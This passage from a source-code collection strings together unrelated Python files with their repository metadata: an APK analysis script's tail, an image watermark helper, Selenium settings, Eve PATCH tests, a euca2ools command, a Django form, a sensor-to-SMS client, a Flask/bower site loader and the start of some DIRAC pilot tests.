return self.packageNames[0]
def getHashes(self, block_size=2 ** 8):
"""
Calculate MD5,SHA-1, SHA-256
hashes of APK input file
"""
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
f = open(self.filename, 'rb')
while True:
data = f.read(block_size)
if not data:
break
md5.update(data)
sha1.update(data)
sha256.update(data)
return [md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()]
def decode(s, encodings=('ascii', 'utf8', 'latin1')):
for encoding in encodings:
try:
return s.decode(encoding)
except UnicodeDecodeError:
pass
return s.decode('ascii', 'ignore')
def getTags(tagParam):
"""
Retrieve the tag names
"""
tagsFound = []
for tag in tags.keys():
if tagParam & tag != 0:
tagsFound.append(tags[tag])
return tagsFound
def hexToStr(hexStr):
"""
Convert a string hex byte values into a byte string
"""
bytes = []
hexStr = ''.join(hexStr.split(" "))
for i in range(0, len(hexStr), 2):
bytes.append(chr(int(hexStr[i:i + 2], 16)))
return unicode(''.join(bytes), errors='replace')
def interruptHandler(signum, frame):
"""
Raise interrupt for the blocking call 'logcatInput = sys.stdin.readline()'
"""
raise KeyboardInterrupt
def main():
argv = sys.argv
if len(argv) < 2 or len(argv) > 3:
print("Usage: droidbox_compatible.py filename.apk <duration in seconds>")
sys.exit(1)
duration = 0
# Duration given?
if len(argv) == 3:
duration = int(argv[2])
apkName = sys.argv[1]
# APK existing?
if os.path.isfile(apkName) == False:
print("File %s not found" % argv[1])
sys.exit(1)
droidbox = DroidBox()
droidbox.set_apk(apkName)
droidbox.start_blocked(duration)
# droidbox.get_output()
if __name__ == "__main__":
main()
|
nastya/droidbot
|
droidbox_scripts/droidbox_compatible.py
|
Python
|
mit
| 24,119 | 0.006468 |
# -*- coding: UTF-8 -*
'''
Created on 2015年1月18日
@author: RobinTang
'''
try:
import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
import StringIO
filters = {
('blur', ImageFilter.BLUR, '模糊滤镜'),
('contour', ImageFilter.CONTOUR, '轮廓'),
('edge_enhance', ImageFilter.EDGE_ENHANCE, '边界加强'),
('edge_enhance_more', ImageFilter.EDGE_ENHANCE_MORE, '边界加强(阀值更大)'),
('emboss', ImageFilter.EMBOSS, '浮雕滤镜'),
('find_edges', ImageFilter.FIND_EDGES, '边界滤镜'),
('smooth', ImageFilter.SMOOTH, '平滑滤镜'),
('smooth_more', ImageFilter.SMOOTH_MORE, '平滑滤镜(阀值更大)'),
('sharpen', ImageFilter.SHARPEN, '锐化滤镜'),
}
filtersmap = dict([(v[0], (v[1], v[2])) for v in filters])
def getfont(size):
import os, sys
try:
file_name = os.path.dirname(sys.modules['img'].__file__)
path = os.path.abspath(file_name)
except:
path = ''
font = ImageFont.truetype(os.path.join(path, "font.ttf"), size)
return font
def fitto(src, dw=360, dh=200):
dst = Image.new("RGBA", (dw, dh), (255, 255, 255, 0))
sw = src.size[0]
sh = src.size[1]
kw = float(sw) / float(dw)
kh = float(sh) / float(dh)
w, h = 0, 0
if kw > kh:
w, h = int(dw), int(sh / kw)
else:
w, h = int(sw / kh), int(dh)
nsrc = src.resize((w, h),)
x = (dw - w) / 2
y = (dh - h) / 2
dst.paste(nsrc, (x, y, x + w, y + h))
return dst
def watermark(m, s, color=(0, 0, 0, 255), size=20):
draw = ImageDraw.Draw(m)
font = getfont(size)
fsize = font.getsize(s)
draw.text((m.size[0] - fsize[0] - fsize[1] / 5, m.size[1] - fsize[1]), s, font=font, fill=color)
return m
def getimg(path):
if path.startswith("http://") or path.startswith("https://"):
import urllib2
import io
dats = io.BytesIO(urllib2.urlopen(path).read())
m = Image.open(dats)
# dats.close()
return m
else:
return Image.open(path)
def getimgwithdats(dats):
m = Image.open(dats)
return m
def getimgbytes(m, fmt="png"):
out = StringIO.StringIO()
m.save(out, fmt)
out.seek(0)
dats = out.read()
out.close()
return dats
if __name__ == "__main__":
m = getimg("http://img0.bdstatic.com/img/image/shouye/xinshouye/meishi116.jpg")
m = fitto(m, 300, 300)
m = watermark(m, "Powered by Sin")
m.show()
|
sintrb/urlimg
|
img/funs.py
|
Python
|
gpl-2.0
| 2,541 | 0.006528 |
from selenium.webdriver import Firefox
from selenium.webdriver.common.by import By
driver_class = Firefox
implicit_timeout = 30
wait_timeout = 30
default_search_type = By.ID
try:
from local_webium_settings import *
except ImportError:
pass
|
drptbl/webium
|
webium/settings.py
|
Python
|
apache-2.0
| 251 | 0 |
from bson import ObjectId
import simplejson as json
from eve.tests import TestBase
from eve.tests.test_settings import MONGO_DBNAME
from eve.tests.utils import DummyEvent
from eve import STATUS_OK, LAST_UPDATED, ID_FIELD, ISSUES, STATUS, ETAG
from eve.methods.patch import patch_internal
class TestPatch(TestBase):
def test_patch_to_resource_endpoint(self):
_, status = self.patch(self.known_resource_url, data={})
self.assert405(status)
def test_readonly_resource(self):
_, status = self.patch(self.readonly_id_url, data={})
self.assert405(status)
def test_unknown_id(self):
_, status = self.patch(self.unknown_item_id_url,
data={"key1": 'value1'})
self.assert404(status)
def test_unknown_id_different_resource(self):
# patching a 'user' with a valid 'contact' id will 404
_, status = self.patch('%s/%s/' % (self.different_resource,
self.item_id),
data={"key1": "value1"})
self.assert404(status)
# of course we can still patch a 'user'
_, status = self.patch('%s/%s/' % (self.different_resource,
self.user_id),
data={'key1': '{"username": "username1"}'},
headers=[('If-Match', self.user_etag)])
self.assert200(status)
def test_by_name(self):
_, status = self.patch(self.item_name_url, data={'key1': 'value1'})
self.assert405(status)
def test_ifmatch_missing(self):
_, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert403(status)
def test_ifmatch_disabled(self):
self.app.config['IF_MATCH'] = False
r, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert200(status)
self.assertTrue(ETAG not in r)
def test_ifmatch_bad_etag(self):
_, status = self.patch(self.item_id_url,
data={'key1': 'value1'},
headers=[('If-Match', 'not-quite-right')])
self.assert412(status)
def test_unique_value(self):
# TODO
# for the time being we are happy with testing only Eve's custom
# validation. We rely on Cerberus' own test suite for other validation
# unit tests. This test also makes sure that response status is
# syntatically correcy in case of validation issues.
# We should probably test every single case as well (seems overkill).
r, status = self.patch(self.item_id_url,
data={"ref": "%s" % self.alt_ref},
headers=[('If-Match', self.item_etag)])
self.assertValidationErrorStatus(status)
self.assertValidationError(r, {'ref': "value '%s' is not unique" %
self.alt_ref})
def test_patch_string(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_integer(self):
field = "prog"
test_value = 9999
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_list_as_array(self):
field = "role"
test_value = ["vendor", "client"]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertTrue(set(test_value).issubset(db_value))
def test_patch_rows(self):
field = "rows"
test_value = [
{'sku': 'AT1234', 'price': 99},
{'sku': 'XF9876', 'price': 9999}
]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
for test_item in test_value:
self.assertTrue(test_item in db_value)
def test_patch_list(self):
field = "alist"
test_value = ["a_string", 99]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_dict(self):
field = "location"
test_value = {'address': 'an address', 'city': 'a city'}
changes = {field: test_value}
original_city = []
def keep_original_city(resource_name, updates, original):
original_city.append(original['location']['city'])
self.app.on_update += keep_original_city
self.app.on_updated += keep_original_city
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
self.assertEqual(original_city[0], original_city[1])
def test_patch_datetime(self):
field = "born"
test_value = "Tue, 06 Nov 2012 10:33:31 GMT"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_objectid(self):
field = "tid"
test_value = "4f71c129c88e2018d4000000"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_null_objectid(self):
# verify that #341 is fixed.
field = "tid"
test_value = None
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_defaults(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title', r)
def test_patch_defaults_with_post_override(self):
field = "ref"
test_value = "1234567890123456789012345"
r = self.perform_patch_with_post_override(field, test_value)
self.assert200(r.status_code)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title',
json.loads(r.get_data()))
def test_patch_multiple_fields(self):
fields = ['ref', 'prog', 'role']
test_values = ["9876543210987654321054321", 123, ["agent"]]
changes = {"ref": test_values[0], "prog": test_values[1],
"role": test_values[2]}
r = self.perform_patch(changes)
db_values = self.compare_patch_with_get(fields, r)
for i in range(len(db_values)):
self.assertEqual(db_values[i], test_values[i])
def test_patch_with_post_override(self):
# a POST request with PATCH override turns into a PATCH request
r = self.perform_patch_with_post_override('prog', 1)
self.assert200(r.status_code)
def test_patch_internal(self):
# test that patch_internal is available and working properly.
test_field = 'ref'
test_value = "9876543210987654321098765"
data = {test_field: test_value}
with self.app.test_request_context(self.item_id_url):
r, _, _, status = patch_internal(
self.known_resource, data, concurrency_check=False,
**{'_id': self.item_id})
db_value = self.compare_patch_with_get(test_field, r)
self.assertEqual(db_value, test_value)
self.assert200(status)
def test_patch_etag_header(self):
# test that Etag is always includer with response header. See #562.
changes = {"ref": "1234567890123456789012345"}
headers = [('Content-Type', 'application/json'),
('If-Match', self.item_etag)]
r = self.test_client.patch(self.item_id_url,
data=json.dumps(changes),
headers=headers)
self.assertTrue('Etag' in r.headers)
def test_patch_nested(self):
changes = {'location.city': 'a nested city',
'location.address': 'a nested address'}
r = self.perform_patch(changes)
values = self.compare_patch_with_get('location', r)
self.assertEqual(values['city'], 'a nested city')
self.assertEqual(values['address'], 'a nested address')
def perform_patch(self, changes):
r, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
self.assertPatchResponse(r, self.item_id)
return r
def perform_patch_with_post_override(self, field, value):
headers = [('X-HTTP-Method-Override', 'PATCH'),
('If-Match', self.item_etag),
('Content-Type', 'application/json')]
return self.test_client.post(self.item_id_url,
data=json.dumps({field: value}),
headers=headers)
def compare_patch_with_get(self, fields, patch_response):
raw_r = self.test_client.get(self.item_id_url)
r, status = self.parse_response(raw_r)
self.assert200(status)
self.assertEqual(raw_r.headers.get('ETag'),
patch_response[ETAG])
if isinstance(fields, str):
return r[fields]
else:
return [r[field] for field in fields]
def test_patch_allow_unknown(self):
changes = {"unknown": "unknown"}
r, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assertValidationErrorStatus(status)
self.assertValidationError(r, {'unknown': 'unknown field'})
self.app.config['DOMAIN'][self.known_resource]['allow_unknown'] = True
r, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
self.assertPatchResponse(r, self.item_id)
def test_patch_x_www_form_urlencoded(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
headers = [('If-Match', self.item_etag)]
r, status = self.parse_response(self.test_client.patch(
self.item_id_url, data=changes, headers=headers))
self.assert200(status)
self.assertTrue('OK' in r[STATUS])
def test_patch_referential_integrity(self):
data = {"person": self.unknown_item_id}
headers = [('If-Match', self.invoice_etag)]
r, status = self.patch(self.invoice_id_url, data=data, headers=headers)
self.assertValidationErrorStatus(status)
expected = ("value '%s' must exist in resource '%s', field '%s'" %
(self.unknown_item_id, 'contacts',
self.app.config['ID_FIELD']))
self.assertValidationError(r, {'person': expected})
data = {"person": self.item_id}
r, status = self.patch(self.invoice_id_url, data=data, headers=headers)
self.assert200(status)
self.assertPatchResponse(r, self.invoice_id)
def test_patch_write_concern_success(self):
# 0 and 1 are the only valid values for 'w' on our mongod instance (1
# is the default)
self.domain['contacts']['mongo_write_concern'] = {'w': 0}
field = "ref"
test_value = "X234567890123456789012345"
changes = {field: test_value}
_, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
def test_patch_write_concern_fail(self):
# should get a 500 since there's no replicaset on the mongod instance
self.domain['contacts']['mongo_write_concern'] = {'w': 2}
field = "ref"
test_value = "X234567890123456789012345"
changes = {field: test_value}
_, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert500(status)
def test_patch_missing_standard_date_fields(self):
"""Documents created outside the API context could be lacking the
LAST_UPDATED and/or DATE_CREATED fields.
"""
# directly insert a document, without DATE_CREATED e LAST_UPDATED
# values.
contacts = self.random_contacts(1, False)
ref = 'test_update_field'
contacts[0]['ref'] = ref
_db = self.connection[MONGO_DBNAME]
_db.contacts.insert(contacts)
# now retrieve same document via API and get its etag, which is
# supposed to be computed on default DATE_CREATED and LAST_UPDATAED
# values.
response, status = self.get(self.known_resource, item=ref)
etag = response[ETAG]
_id = response['_id']
# attempt a PATCH with the new etag.
field = "ref"
test_value = "X234567890123456789012345"
changes = {field: test_value}
_, status = self.patch('%s/%s' % (self.known_resource_url, _id),
data=changes, headers=[('If-Match', etag)])
self.assert200(status)
def test_patch_subresource(self):
_db = self.connection[MONGO_DBNAME]
# create random contact
fake_contact = self.random_contacts(1)
fake_contact_id = _db.contacts.insert(fake_contact)[0]
# update first invoice to reference the new contact
_db.invoices.update({'_id': ObjectId(self.invoice_id)},
{'$set': {'person': fake_contact_id}})
# GET all invoices by new contact
response, status = self.get('users/%s/invoices/%s' %
(fake_contact_id, self.invoice_id))
etag = response[ETAG]
data = {"inv_number": "new_number"}
headers = [('If-Match', etag)]
response, status = self.patch('users/%s/invoices/%s' %
(fake_contact_id, self.invoice_id),
data=data, headers=headers)
self.assert200(status)
self.assertPatchResponse(response, self.invoice_id)
def test_patch_bandwidth_saver(self):
changes = {'ref': '1234567890123456789012345'}
# bandwidth_saver is on by default
self.assertTrue(self.app.config['BANDWIDTH_SAVER'])
r = self.perform_patch(changes)
self.assertFalse('ref' in r)
db_value = self.compare_patch_with_get(self.app.config['ETAG'], r)
self.assertEqual(db_value, r[self.app.config['ETAG']])
self.item_etag = r[self.app.config['ETAG']]
# test return all fields (bandwidth_saver off)
self.app.config['BANDWIDTH_SAVER'] = False
r = self.perform_patch(changes)
self.assertTrue('ref' in r)
db_value = self.compare_patch_with_get(self.app.config['ETAG'], r)
self.assertEqual(db_value, r[self.app.config['ETAG']])
def test_patch_readonly_field_with_previous_document(self):
schema = self.domain['contacts']['schema']
del(schema['ref']['required'])
# disable read-only on the field so we can store a value which is
# also different form its default value.
schema['read_only_field']['readonly'] = False
changes = {'read_only_field': 'value'}
r = self.perform_patch(changes)
# resume read-only status for the field
self.domain['contacts']['schema']['read_only_field']['readonly'] = True
# test that if the read-only field is included with the payload and its
# value is equal to the one stored with the document, validation
# succeeds (#479).
etag = r['_etag']
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', etag)])
self.assert200(status)
self.assertPatchResponse(r, self.item_id)
# test that if the read-only field is included with the payload and its
# value is different from the stored document, validation fails.
etag = r['_etag']
changes = {'read_only_field': 'another value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', etag)])
self.assert422(status)
self.assertTrue('is read-only' in r['_issues']['read_only_field'])
def test_patch_nested_document_not_overwritten(self):
""" Test that nested documents are not overwritten on PATCH and #519
is fixed.
"""
schema = {
'sensor': {
"type": "dict",
"schema": {
"name": {"type": "string"},
"lon": {"type": "float"},
"lat": {"type": "float"},
"value": {"type": "float", "default": 10.3},
"dict": {
'type': 'dict',
'schema': {
'string': {'type': 'string'},
'int': {'type': 'integer'},
}
}
}
},
'test': {
'type': 'string',
'readonly': True,
'default': 'default'
}
}
self.app.config['BANDWIDTH_SAVER'] = False
self.app.register_resource('sensors', {'schema': schema})
changes = {
'sensor': {
'name': 'device_name',
'lon': 43.4,
'lat': 1.31,
'dict': {'int': 99}
}
}
r, status = self.post("sensors", data=changes)
self.assert201(status)
id, etag, value, test, int = (
r[ID_FIELD],
r[ETAG],
r['sensor']['value'],
r['test'],
r['sensor']['dict']['int']
)
changes = {
'sensor': {
'lon': 10.0,
'dict': {'string': 'hi'}
}
}
r, status = self.patch(
"/%s/%s" % ('sensors', id),
data=changes,
headers=[('If-Match', etag)]
)
self.assert200(status)
etag, value, int = (
r[ETAG],
r['sensor']['value'],
r['sensor']['dict']['int']
)
self.assertEqual(value, 10.3)
self.assertEqual(test, 'default')
self.assertEqual(int, 99)
def test_patch_nested_document_nullable_missing(self):
schema = {
'sensor': {
'type': 'dict',
'schema': {
'name': {'type': 'string'},
},
'default': None,
},
'other': {
'type': 'dict',
'schema': {
'name': {'type': 'string'},
},
}
}
self.app.config['BANDWIDTH_SAVER'] = False
self.app.register_resource('sensors', {'schema': schema})
changes = {}
r, status = self.post("sensors", data=changes)
self.assert201(status)
id, etag = r[ID_FIELD], r[ETAG]
self.assertTrue('sensor' in r)
self.assertEqual(r['sensor'], None)
self.assertFalse('other' in r)
changes = {
'sensor': {'name': 'device_name'},
'other': {'name': 'other_name'},
}
r, status = self.patch(
"/%s/%s" % ('sensors', id),
data=changes,
headers=[('If-Match', etag)]
)
self.assert200(status)
self.assertEqual(r['sensor'], {'name': 'device_name'})
self.assertEqual(r['other'], {'name': 'other_name'})
def test_patch_dependent_field_on_origin_document(self):
""" Test that when patching a field which is dependent on another and
this other field is not provided with the patch but is still present
on the target document, the patch will be accepted. See #363.
"""
# this will fail as dependent field is missing even in the
# document we are trying to update.
del(self.domain['contacts']['schema']['dependency_field1']['default'])
del(self.domain['contacts']['defaults']['dependency_field1'])
changes = {'dependency_field2': 'value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', self.item_etag)])
self.assert422(status)
# update the stored document by adding dependency field.
changes = {'dependency_field1': 'value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
# now the field2 update will be accepted as the dependency field is
# present in the stored document already.
etag = r['_etag']
changes = {'dependency_field2': 'value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', etag)])
self.assert200(status)
def assertPatchResponse(self, response, item_id):
self.assertTrue(STATUS in response)
self.assertTrue(STATUS_OK in response[STATUS])
self.assertFalse(ISSUES in response)
self.assertTrue(ID_FIELD in response)
self.assertEqual(response[ID_FIELD], item_id)
self.assertTrue(LAST_UPDATED in response)
self.assertTrue(ETAG in response)
self.assertTrue('_links' in response)
self.assertItemLink(response['_links'], item_id)
def patch(self, url, data, headers=[]):
headers.append(('Content-Type', 'application/json'))
r = self.test_client.patch(url,
data=json.dumps(data),
headers=headers)
return self.parse_response(r)
class TestEvents(TestBase):
new_ref = "0123456789012345678901234"
def test_on_pre_PATCH(self):
devent = DummyEvent(self.before_update)
self.app.on_pre_PATCH += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(3, len(devent.called))
def test_on_pre_PATCH_contacts(self):
devent = DummyEvent(self.before_update)
self.app.on_pre_PATCH_contacts += devent
self.patch()
self.assertEqual(2, len(devent.called))
def test_on_PATCH_dynamic_filter(self):
def filter_this(resource, request, lookup):
lookup["_id"] = self.unknown_item_id
self.app.on_pre_PATCH += filter_this
# Would normally patch the known document; will return 404 instead.
r, s = self.parse_response(self.patch())
self.assert404(s)
def test_on_post_PATCH(self):
devent = DummyEvent(self.after_update)
self.app.on_post_PATCH += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(200, devent.called[2].status_code)
self.assertEqual(3, len(devent.called))
def test_on_post_PATCH_contacts(self):
devent = DummyEvent(self.after_update)
self.app.on_post_PATCH_contacts += devent
self.patch()
self.assertEqual(200, devent.called[1].status_code)
self.assertEqual(2, len(devent.called))
def test_on_update(self):
devent = DummyEvent(self.before_update)
self.app.on_update += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(3, len(devent.called))
def test_on_update_contacts(self):
devent = DummyEvent(self.before_update)
self.app.on_update_contacts += devent
self.patch()
self.assertEqual(2, len(devent.called))
def test_on_updated(self):
devent = DummyEvent(self.after_update)
self.app.on_updated += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(3, len(devent.called))
def test_on_updated_contacts(self):
devent = DummyEvent(self.after_update)
self.app.on_updated_contacts += devent
self.patch()
self.assertEqual(2, len(devent.called))
def before_update(self):
db = self.connection[MONGO_DBNAME]
contact = db.contacts.find_one(ObjectId(self.item_id))
return contact['ref'] == self.item_name
def after_update(self):
return not self.before_update()
def patch(self):
headers = [('Content-Type', 'application/json'),
('If-Match', self.item_etag)]
data = json.dumps({"ref": self.new_ref})
return self.test_client.patch(
self.item_id_url, data=data, headers=headers)
|
jzorrof/eve
|
eve/tests/methods/patch.py
|
Python
|
bsd-3-clause
| 25,507 | 0 |
# Copyright 2009-2013 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from euca2ools.commands.ec2 import EC2Request
from requestbuilder import Arg, Filter
class DescribeBundleTasks(EC2Request):
DESCRIPTION = 'Describe current instance-bundling tasks'
ARGS = [Arg('BundleId', metavar='BUNDLE', nargs='*',
help='limit results to specific bundle tasks')]
FILTERS = [Filter('bundle-id', help='bundle task ID'),
Filter('error-code',
help='if the task failed, the error code returned'),
Filter('error-message',
help='if the task failed, the error message returned'),
Filter('instance-id', help='ID of the bundled instance'),
Filter('progress', help='level of task completion, in percent'),
Filter('s3-bucket',
help='bucket where the image will be stored'),
Filter('s3-prefix', help='beginning of the bundle name'),
Filter('start-time', help='task start time'),
Filter('state', help='task state'),
Filter('update-time', help='most recent task update time')]
LIST_TAGS = ['bundleInstanceTasksSet']
def print_result(self, result):
for task in result.get('bundleInstanceTasksSet', []):
self.print_bundle_task(task)
|
jhajek/euca2ools
|
euca2ools/commands/ec2/describebundletasks.py
|
Python
|
bsd-2-clause
| 2,642 | 0 |
from django import forms
from oldcontrib.media.document.models import Document
class DocumentUpload(forms.ModelForm):
class Meta:
model = Document
fields = ('document',)
|
servee/django-servee-oldcontrib
|
oldcontrib/media/document/forms.py
|
Python
|
bsd-3-clause
| 190 | 0.010526 |
import json
import socket
from comms_manager import CommsManager
from constants import *
class BoardManager:
def __init__(self, args):
self.server_address = (args.IP, args.PORT)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.sock.connect(self.server_address)
self.cm = CommsManager(args.TO, args.FROM, args.TWKEY)
def activate(self):
"""
Continuously feeds server with sensor data and responds training requests
"""
while True:
try:
humidity, temperature = self.cm.take_single_sample()
packet = json.dumps({'scores': {'temperature': temperature,
'humidity': humidity}})
self.sock.send(packet)
resp = self.sock.recv(1024)
if resp:
resp = json.loads(resp)
if resp['response'] == -1:
self.cm.send_sms(
message='There is a temperature problem at station 2. For detailed'
' info siemenshackathon://scheme.net.siemenshackathon')
self.cm.blink(2, 17)
if resp['responsesound'] == -1:
self.cm.send_sms(
message='There might be a malfunction at station 2. For detailed '
'info siemenshackathon://scheme.net.siemenshackathon')
self.cm.buzzer(2, 26)
if len([key for key, value in resp.iteritems() if key == 'train']):
# Train command makes a quick training through environment and sends
# results back
self.cm.take_sample(20, 'temperature', 'humidity')
# 'npy' field notify server for incoming training files
# Only temperature data used for ML
self.sock.send(json.dumps({'npy': 1, 'humid_file_name': HUMIDITY_DATA_FILE,
'temp_file_name': TEMPERATURE_DATA_FILE}))
fdesc = open(TEMPERATURE_DATA_FILE, 'rb')
data = fdesc.read(1024)
while data:
self.sock.send(data)
data = fdesc.read(1024)
fdesc.close()
except Exception as e:
print 'Error occurred during sending file: ', str(e)
continue
|
TeamProxima/predictive-fault-tracker
|
board/board_manager.py
|
Python
|
mit
| 2,638 | 0.003412 |
"""Process `site.json` and bower package tools."""
import os
import json
import subprocess
from functools import partial
import importlib
import sys
from flask import Flask, render_template, g, redirect, current_app
from gitloader import git_show
from import_code import import_code
try:
from app import app
except ImportError:
from deckmaster.app import app
sys.path.append('.')
component_dir = 'static/components'
bower_str = 'bower install --config.directory="%s" %s > /dev/null'
def get_pkg_dir(package):
"""Join the component and package directory."""
return os.path.join(component_dir, package)
def get_pkg_main(package):
"""Check `package.json` then `bower.json` for the main included file."""
pkg = json.load(
open(os.path.join(get_pkg_dir(package), 'bower.json'))
)
if isinstance(pkg['main'],list):
return [os.path.join(get_pkg_dir(package), p) for p in pkg['main']]
else:
return os.path.join(get_pkg_dir(package), pkg['main'])
def check_pkg(package):
"""CHeck if the package exists, if not use bower to install."""
if not os.path.exists(os.path.join(component_dir, package)):
subprocess.call(
bower_str % (component_dir, package),
shell = True
)
return True
def script_or_style(path):
if path.endswith('js'):
return 'script'
elif path.endswith('css'):
return 'style'
else:
print "Script or style? " + path
def process_bower(deps):
retval = {'styles':[], 'scripts':[]}
try:
for pkg in deps['bower']:
check_pkg(pkg)
main = get_pkg_main(pkg)
if isinstance(main,list):
pkgassets = {}
for path in reversed(main):
try:
pkgassets[script_or_style(path)+'s'] = [path]
except TypeError:
pass
retval['scripts'] += pkgassets['scripts']
retval['styles'] += pkgassets['styles']
else:
retval[script_or_style(main)+'s'].append(main)
except KeyError:
pass
return retval
def process_local(deps):
retval = {'styles':[], 'scripts':[]}
try:
for path in deps['local']:
retval[script_or_style(path)+'s'].append(path)
except KeyError:
pass
return retval
def process_deps(deps):
"""Process script element in the config for local vs bower components."""
local, bower = process_local(deps), process_bower(deps)
retval = {}
for tag in local:
retval[tag] = local[tag] + bower[tag]
return retval
def process_route(route):
if not route.get('view'):
def route_handler(revid = None, path = None):
g.revid = revid
try:
return render_template(
'html/base.html', **process_deps(route['deps'])
)
except AttributeError:
return 'Not Found', 404
return route_handler
mname, fname = route['view'].rsplit('.', 1)
module = importlib.import_module(mname)
viewfunc = getattr(module, fname)
def route_handler(revid = None, path = None):
if revid is not None:
codestr = git_show('./views.py', revid)
mod = import_code(codestr, mname)
return getattr(mod,fname)()
return viewfunc()
return route_handler
def lazy_router(revid, path = None):
g.revid = revid
if path is None:
path = ''
if not path.startswith('/'):
path = '/' + path
cfgstr = git_show('./site.json', revid)
try:
return process_route(json.loads(cfgstr)[path])(revid, path)
except KeyError:
print cfgstr
def process_site(site = None, revid = None):
"""Process `site.json` based on the config and CLI options."""
if site is None:
try:
site = json.load(open('site.json'))
except IOError:
return []
if 'deps' in site:
return [
('/', 'index', process_route(site)),
('/<revid>/', 'index_revid', process_route(site)),
]
retval = [
('/favicon.ico', 'favicon', lambda: ''),
('/<revid>/', 'revid_lazy_index', lazy_router),
('/<revid>/<path:path>', 'revid_lazy', lazy_router),
]
for rt in site:
retval.append((rt, 'index' if rt=='/' else rt, process_route(site[rt])))
return retval
|
cacahootie/deckmaster
|
deckmaster/app/process_site.py
|
Python
|
mit
| 4,475 | 0.007374 |
""" Test class for Pilot
"""
# pylint: disable=protected-access, missing-docstring, invalid-name, line-too-long
# imports
import unittest
import json
import stat
import sys
import os
import shutil
from Pilot.pilotTools import PilotParams
from Pilot.pilotCommands import CheckWorkerNode, ConfigureSite, NagiosProbes
class PilotTestCase(unittest.TestCase):
""" Base class for the Agents test cases
"""
def setUp(self):
# Define a local file for test, and all the necessary parameters
with open('pilot.json', 'w') as fp:
json.dump({'Setups': {'TestSetup': {'Commands': {'cetype1': 'x,y, z',
'cetype2': ['d', 'f']},
'CommandExtensions': 'TestExtension1,TestExtension2',
'NagiosProbes': 'Nagios1,Nagios2',
'NagiosPutURL': 'https://127.0.0.2/',
'Version': 'v1r1, v2r2'
}
},
'CEs': {'grid1.example.com': {'GridCEType': 'cetype1', 'Site': 'site.example.com'}},
'DefaultSetup': 'TestSetup'},
fp)
def tearDown(self):
for fileProd in [
'pilot.json',
'Nagios1',
'Nagios2',
'PilotAgentUUID',
'dev.tgz',
'pilot.out',
'123.txt',
'testing.tgz']:
try:
os.remove(fileProd)
except OSError:
pass
try:
shutil.rmtree('ReplacementCode')
except OSError:
pass
class CommandsTestCase(PilotTestCase):
